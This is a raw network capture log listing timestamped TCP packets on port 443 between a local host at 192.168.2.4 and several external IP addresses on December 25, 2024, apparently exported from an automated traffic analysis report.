                                                        Dec 25, 2024 02:23:13.435098886 CET49765443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.435105085 CET44349765104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.437567949 CET44349767104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.437617064 CET49767443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.437621117 CET44349767104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.439677954 CET44349764104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.439733028 CET49764443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.439740896 CET44349764104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.440920115 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.440980911 CET49766443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.440988064 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.442717075 CET44349765104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.442763090 CET49765443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.442769051 CET44349765104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.445555925 CET44349767104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.445631027 CET49767443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.445636034 CET44349767104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.447616100 CET44349764104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.447657108 CET49764443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.447664976 CET44349764104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.448368073 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.448412895 CET49766443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.448421001 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.449542999 CET44349765104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.449595928 CET49765443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.449601889 CET44349765104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.458940029 CET44349767104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.458990097 CET49767443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.458996058 CET44349767104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.496187925 CET49765443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.496190071 CET49764443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.496190071 CET49766443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.496200085 CET44349764104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.496212006 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.511482954 CET49767443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.511488914 CET44349767104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.541860104 CET49766443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.542027950 CET49764443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.557339907 CET49767443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.558521986 CET44349767104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.562988997 CET44349767104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.563041925 CET49767443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.563047886 CET44349767104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.566194057 CET44349764104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.566977978 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.566999912 CET44349765104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.569494963 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.569544077 CET49766443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.569555044 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.569693089 CET44349765104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.569741011 CET44349765104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.569750071 CET49765443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.569756031 CET44349765104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.569802999 CET49765443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.570180893 CET44349767104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.570238113 CET49767443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.570242882 CET44349767104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.570259094 CET44349764104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.570445061 CET49764443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.570453882 CET44349764104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.574404001 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.574412107 CET44349765104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.574466944 CET49766443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.574475050 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.578766108 CET44349764104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.578794956 CET44349764104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.578810930 CET49764443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.578823090 CET44349764104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.578867912 CET49764443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.579287052 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.579302073 CET44349765104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.579350948 CET49766443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.579360008 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.579387903 CET49765443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.579394102 CET44349765104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.584250927 CET44349765104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.584307909 CET49765443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.584314108 CET44349765104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.585180044 CET44349767104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.585231066 CET49767443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.585236073 CET44349767104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.585273027 CET49767443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.587033987 CET44349764104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.592178106 CET44349767104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.592185020 CET44349767104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.592233896 CET49767443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.592639923 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.592650890 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.592694998 CET49766443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.592705011 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.593359947 CET44349765104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.593414068 CET49765443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.593419075 CET44349765104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.593462944 CET49765443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.596919060 CET44349764104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.596966028 CET49764443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.596973896 CET44349764104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.597285032 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.597340107 CET49766443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.597347021 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.597385883 CET49766443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.599332094 CET44349767104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.599376917 CET49767443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.601793051 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.601845026 CET49766443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.602930069 CET44349765104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.602940083 CET44349765104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.602978945 CET44349765104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.602993011 CET49765443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.602998018 CET44349765104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.603033066 CET49765443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.603099108 CET44349765104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.603143930 CET49765443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.603677988 CET49765443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.603686094 CET44349765104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.608088017 CET44349767104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.608094931 CET44349767104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.608164072 CET49767443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.609148026 CET44349764104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.609210968 CET49764443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.609220028 CET44349764104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.609457970 CET49764443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.610548019 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.610555887 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.610620975 CET49766443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.612373114 CET44349767104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.612433910 CET49767443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.612437010 CET44349767104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.612449884 CET44349767104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.612499952 CET49767443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.613392115 CET49767443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.613396883 CET44349767104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.619330883 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.619338989 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.619400024 CET49766443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.624428988 CET44349764104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.624444962 CET44349764104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.624474049 CET44349764104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.624492884 CET49764443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.624502897 CET44349764104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.624535084 CET49764443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.624558926 CET44349764104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.624692917 CET49764443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.624862909 CET49764443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.624881029 CET44349764104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.626904964 CET44349770104.17.24.14192.168.2.4
                                                        Dec 25, 2024 02:23:13.627213955 CET49770443192.168.2.4104.17.24.14
                                                        Dec 25, 2024 02:23:13.627239943 CET44349770104.17.24.14192.168.2.4
                                                        Dec 25, 2024 02:23:13.628405094 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.628411055 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.628457069 CET49766443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.630763054 CET44349770104.17.24.14192.168.2.4
                                                        Dec 25, 2024 02:23:13.630829096 CET49770443192.168.2.4104.17.24.14
                                                        Dec 25, 2024 02:23:13.631159067 CET49770443192.168.2.4104.17.24.14
                                                        Dec 25, 2024 02:23:13.631298065 CET49770443192.168.2.4104.17.24.14
                                                        Dec 25, 2024 02:23:13.631354094 CET44349770104.17.24.14192.168.2.4
                                                        Dec 25, 2024 02:23:13.633268118 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.633275032 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.633322954 CET49766443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.641797066 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.641850948 CET49766443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.671372890 CET49770443192.168.2.4104.17.24.14
                                                        Dec 25, 2024 02:23:13.671391964 CET44349770104.17.24.14192.168.2.4
                                                        Dec 25, 2024 02:23:13.712225914 CET49770443192.168.2.4104.17.24.14
                                                        Dec 25, 2024 02:23:13.751523972 CET49776443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.751601934 CET44349776104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.751709938 CET49777443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.751741886 CET44349777104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.751744032 CET49776443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.751849890 CET49777443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.752084970 CET49776443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.752118111 CET44349776104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.752266884 CET49777443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.752278090 CET44349777104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.758980989 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.759042025 CET49766443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.764254093 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.764307022 CET49766443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.768134117 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.768197060 CET49766443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.776458979 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.776518106 CET49766443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.782413006 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.782488108 CET49766443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.789613008 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.789669037 CET49766443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.794411898 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.794473886 CET49766443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.800659895 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.800740004 CET49766443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.801770926 CET44349771104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:13.802002907 CET49771443192.168.2.4104.18.10.207
                                                        Dec 25, 2024 02:23:13.802011967 CET44349771104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:13.805542946 CET44349771104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:13.805612087 CET49771443192.168.2.4104.18.10.207
                                                        Dec 25, 2024 02:23:13.806060076 CET49771443192.168.2.4104.18.10.207
                                                        Dec 25, 2024 02:23:13.806137085 CET44349771104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:13.806252956 CET49771443192.168.2.4104.18.10.207
                                                        Dec 25, 2024 02:23:13.806257963 CET44349771104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:13.808722973 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.808795929 CET49766443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.812290907 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.812355042 CET49766443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.812364101 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.812377930 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.812413931 CET49766443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.812608004 CET49766443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.812623024 CET44349766104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.822942972 CET49768443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.824429035 CET49778443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.824484110 CET44349778104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.824569941 CET49778443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.825798035 CET44349772104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:13.826203108 CET49772443192.168.2.4104.18.10.207
                                                        Dec 25, 2024 02:23:13.826222897 CET44349772104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:13.826577902 CET49778443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:13.826602936 CET44349778104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.827337027 CET44349772104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:13.827408075 CET49772443192.168.2.4104.18.10.207
                                                        Dec 25, 2024 02:23:13.827682972 CET49772443192.168.2.4104.18.10.207
                                                        Dec 25, 2024 02:23:13.827737093 CET44349772104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:13.827797890 CET49772443192.168.2.4104.18.10.207
                                                        Dec 25, 2024 02:23:13.827805996 CET44349772104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:13.834590912 CET44349773151.101.2.137192.168.2.4
                                                        Dec 25, 2024 02:23:13.834809065 CET49773443192.168.2.4151.101.2.137
                                                        Dec 25, 2024 02:23:13.834830046 CET44349773151.101.2.137192.168.2.4
                                                        Dec 25, 2024 02:23:13.835838079 CET44349773151.101.2.137192.168.2.4
                                                        Dec 25, 2024 02:23:13.835906982 CET49773443192.168.2.4151.101.2.137
                                                        Dec 25, 2024 02:23:13.837805033 CET49773443192.168.2.4151.101.2.137
                                                        Dec 25, 2024 02:23:13.837868929 CET44349773151.101.2.137192.168.2.4
                                                        Dec 25, 2024 02:23:13.837933064 CET49773443192.168.2.4151.101.2.137
                                                        Dec 25, 2024 02:23:13.837940931 CET44349773151.101.2.137192.168.2.4
                                                        Dec 25, 2024 02:23:13.854420900 CET49771443192.168.2.4104.18.10.207
                                                        Dec 25, 2024 02:23:13.867321968 CET44349768104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:13.870050907 CET49772443192.168.2.4104.18.10.207
                                                        Dec 25, 2024 02:23:13.881047964 CET49773443192.168.2.4151.101.2.137
                                                        Dec 25, 2024 02:23:14.081388950 CET44349770104.17.24.14192.168.2.4
                                                        Dec 25, 2024 02:23:14.081546068 CET44349770104.17.24.14192.168.2.4
                                                        Dec 25, 2024 02:23:14.081608057 CET49770443192.168.2.4104.17.24.14
                                                        Dec 25, 2024 02:23:14.081624985 CET44349770104.17.24.14192.168.2.4
                                                        Dec 25, 2024 02:23:14.081723928 CET44349770104.17.24.14192.168.2.4
                                                        Dec 25, 2024 02:23:14.081769943 CET49770443192.168.2.4104.17.24.14
                                                        Dec 25, 2024 02:23:14.081775904 CET44349770104.17.24.14192.168.2.4
                                                        Dec 25, 2024 02:23:14.081901073 CET44349770104.17.24.14192.168.2.4
                                                        Dec 25, 2024 02:23:14.081947088 CET49770443192.168.2.4104.17.24.14
                                                        Dec 25, 2024 02:23:14.081953049 CET44349770104.17.24.14192.168.2.4
                                                        Dec 25, 2024 02:23:14.089389086 CET44349770104.17.24.14192.168.2.4
                                                        Dec 25, 2024 02:23:14.089452028 CET49770443192.168.2.4104.17.24.14
                                                        Dec 25, 2024 02:23:14.089457989 CET44349770104.17.24.14192.168.2.4
                                                        Dec 25, 2024 02:23:14.097690105 CET44349770104.17.24.14192.168.2.4
                                                        Dec 25, 2024 02:23:14.097742081 CET49770443192.168.2.4104.17.24.14
                                                        Dec 25, 2024 02:23:14.097749949 CET44349770104.17.24.14192.168.2.4
                                                        Dec 25, 2024 02:23:14.147558928 CET49770443192.168.2.4104.17.24.14
                                                        Dec 25, 2024 02:23:14.150104046 CET44349768104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:14.150191069 CET44349768104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:14.150248051 CET49768443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:14.150924921 CET49768443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:14.150930882 CET44349768104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:14.201303959 CET44349770104.17.24.14192.168.2.4
                                                        Dec 25, 2024 02:23:14.248456955 CET44349771104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:14.248600006 CET44349771104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:14.248689890 CET44349771104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:14.248760939 CET49771443192.168.2.4104.18.10.207
                                                        Dec 25, 2024 02:23:14.248771906 CET44349771104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:14.248812914 CET49771443192.168.2.4104.18.10.207
                                                        Dec 25, 2024 02:23:14.248819113 CET44349771104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:14.256650925 CET44349771104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:14.256705999 CET49771443192.168.2.4104.18.10.207
                                                        Dec 25, 2024 02:23:14.256715059 CET44349771104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:14.256978989 CET49770443192.168.2.4104.17.24.14
                                                        Dec 25, 2024 02:23:14.256989956 CET44349770104.17.24.14192.168.2.4
                                                        Dec 25, 2024 02:23:14.265089989 CET44349771104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:14.265155077 CET49771443192.168.2.4104.18.10.207
                                                        Dec 25, 2024 02:23:14.265160084 CET44349771104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:14.268074989 CET44349772104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:14.268254042 CET44349772104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:14.268312931 CET49772443192.168.2.4104.18.10.207
                                                        Dec 25, 2024 02:23:14.268318892 CET44349772104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:14.268349886 CET44349772104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:14.268412113 CET49772443192.168.2.4104.18.10.207
                                                        Dec 25, 2024 02:23:14.268426895 CET44349772104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:14.268671989 CET44349772104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:14.268718004 CET49772443192.168.2.4104.18.10.207
                                                        Dec 25, 2024 02:23:14.268732071 CET44349772104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:14.268769026 CET44349773151.101.2.137192.168.2.4
                                                        Dec 25, 2024 02:23:14.269202948 CET44349773151.101.2.137192.168.2.4
                                                        Dec 25, 2024 02:23:14.269243956 CET49773443192.168.2.4151.101.2.137
                                                        Dec 25, 2024 02:23:14.269256115 CET44349773151.101.2.137192.168.2.4
                                                        Dec 25, 2024 02:23:14.269483089 CET44349773151.101.2.137192.168.2.4
                                                        Dec 25, 2024 02:23:14.269516945 CET44349773151.101.2.137192.168.2.4
                                                        Dec 25, 2024 02:23:14.269524097 CET49773443192.168.2.4151.101.2.137
                                                        Dec 25, 2024 02:23:14.269531965 CET44349773151.101.2.137192.168.2.4
                                                        Dec 25, 2024 02:23:14.269572020 CET49773443192.168.2.4151.101.2.137
                                                        Dec 25, 2024 02:23:14.273525000 CET44349771104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:14.273608923 CET49771443192.168.2.4104.18.10.207
                                                        Dec 25, 2024 02:23:14.273614883 CET44349771104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:14.276657104 CET44349770104.17.24.14192.168.2.4
                                                        Dec 25, 2024 02:23:14.276722908 CET49770443192.168.2.4104.17.24.14
                                                        Dec 25, 2024 02:23:14.276735067 CET44349770104.17.24.14192.168.2.4
                                                        Dec 25, 2024 02:23:14.276789904 CET44349772104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:14.276851892 CET49772443192.168.2.4104.18.10.207
                                                        Dec 25, 2024 02:23:14.276869059 CET44349772104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:14.276954889 CET44349770104.17.24.14192.168.2.4
                                                        Dec 25, 2024 02:23:14.277009010 CET49770443192.168.2.4104.17.24.14
                                                        Dec 25, 2024 02:23:14.277321100 CET49770443192.168.2.4104.17.24.14
                                                        Dec 25, 2024 02:23:14.277331114 CET44349770104.17.24.14192.168.2.4
                                                        Dec 25, 2024 02:23:14.285346985 CET44349773151.101.2.137192.168.2.4
                                                        Dec 25, 2024 02:23:14.289494038 CET44349773151.101.2.137192.168.2.4
                                                        Dec 25, 2024 02:23:14.289546013 CET49773443192.168.2.4151.101.2.137
                                                        Dec 25, 2024 02:23:14.289555073 CET44349773151.101.2.137192.168.2.4
                                                        Dec 25, 2024 02:23:14.293504953 CET44349772104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:14.293574095 CET49772443192.168.2.4104.18.10.207
                                                        Dec 25, 2024 02:23:14.293589115 CET44349772104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:14.297821045 CET44349773151.101.2.137192.168.2.4
                                                        Dec 25, 2024 02:23:14.297872066 CET49773443192.168.2.4151.101.2.137
                                                        Dec 25, 2024 02:23:14.297879934 CET44349773151.101.2.137192.168.2.4
                                                        Dec 25, 2024 02:23:14.319262981 CET49771443192.168.2.4104.18.10.207
                                                        Dec 25, 2024 02:23:14.335299969 CET49772443192.168.2.4104.18.10.207
                                                        Dec 25, 2024 02:23:14.350342035 CET49773443192.168.2.4151.101.2.137
                                                        Dec 25, 2024 02:23:14.350348949 CET44349773151.101.2.137192.168.2.4
                                                        Dec 25, 2024 02:23:14.368638992 CET44349771104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:14.387752056 CET44349772104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:14.397557974 CET49773443192.168.2.4151.101.2.137
                                                        Dec 25, 2024 02:23:14.397566080 CET44349773151.101.2.137192.168.2.4
                                                        Dec 25, 2024 02:23:14.412625074 CET49771443192.168.2.4104.18.10.207
                                                        Dec 25, 2024 02:23:14.412632942 CET44349771104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:14.428034067 CET49772443192.168.2.4104.18.10.207
                                                        Dec 25, 2024 02:23:14.428055048 CET44349772104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:14.444124937 CET44349771104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:14.444175005 CET49771443192.168.2.4104.18.10.207
                                                        Dec 25, 2024 02:23:14.444180965 CET44349771104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:14.449661970 CET49773443192.168.2.4151.101.2.137
                                                        Dec 25, 2024 02:23:14.452474117 CET44349771104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:14.452528954 CET49771443192.168.2.4104.18.10.207
                                                        Dec 25, 2024 02:23:14.452533960 CET44349771104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:14.455933094 CET44349771104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:14.455981016 CET49771443192.168.2.4104.18.10.207
                                                        Dec 25, 2024 02:23:14.455986023 CET44349771104.18.10.207192.168.2.4
                                                        Dec 25, 2024 02:23:14.461175919 CET44349773151.101.2.137192.168.2.4
                                                        Dec 25, 2024 02:23:14.464157104 CET44349772104.18.10.207192.168.2.4
